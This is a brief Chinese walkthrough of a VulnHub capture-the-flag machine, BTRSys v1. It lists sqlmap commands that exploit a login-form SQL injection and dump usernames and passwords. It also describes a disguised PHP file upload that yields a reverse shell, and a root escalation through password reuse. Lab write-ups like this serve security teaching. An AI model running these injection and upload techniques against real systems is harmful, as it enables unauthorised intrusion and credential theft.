下载地址:https://download.vulnhub.com/btrsys/BTRSys1.rar
攻击者IP:172.17.120.129 nat vmare
受害者IP:172.17.120.130 nat vmare
主机发现
21端口的ftp可以匿名登陆,但是里面是空的
web是土耳其语
目录扫描
发现后台登陆页面
查看源代码发现有前端验证,不输入btrisk.com会报错
parola存在注入点
sqlmap -r sql.txt --dbs --batch
sqlmap -r sql.txt -D deneme --tables --batch
sqlmap -r sql.txt -D deneme -T user --columns --batch
sqlmap -r sql.txt -D deneme -T user -C Kullanici_Adi,Parola --dump --batch
+------------------+-----------+| Kullanici_Adi| Parola|+------------------+-----------+| [email protected] | asd123*** || [email protected] | asd123*** |+------------------+-----------+
登录后发现可以文件上传
修改png上传,转包在修改成php
反弹成功
http://172.17.120.130/uploads/
su root输入密码asd123***直接提权
原文始发于微信公众号(王之暴龙战神):BTRSys_v1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论